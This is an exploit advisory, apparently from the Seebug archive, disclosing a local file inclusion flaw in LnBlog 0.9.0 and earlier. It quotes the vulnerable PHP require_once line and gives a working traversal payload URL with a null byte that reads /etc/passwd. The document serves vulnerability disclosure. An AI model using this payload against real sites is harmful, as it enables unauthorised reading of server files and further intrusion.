:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ############################################################### # [ LnBlog <= 0.9.0 ] Local File Inclusion Vulnerability # ############################################################### # # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS." # # Script site: http://lnblog.skepticats.com/ # Download: http://lnblog.skepticats.com/content/download/ # http://sourceforge.net/projects/lnblog/ # # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00 # # # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110) # # ... # } elseif ( isset($_GET['plugin']) ) { # require_once("plugins/".$_GET['plugin'].".php"); # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] *******************************************************************************************
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论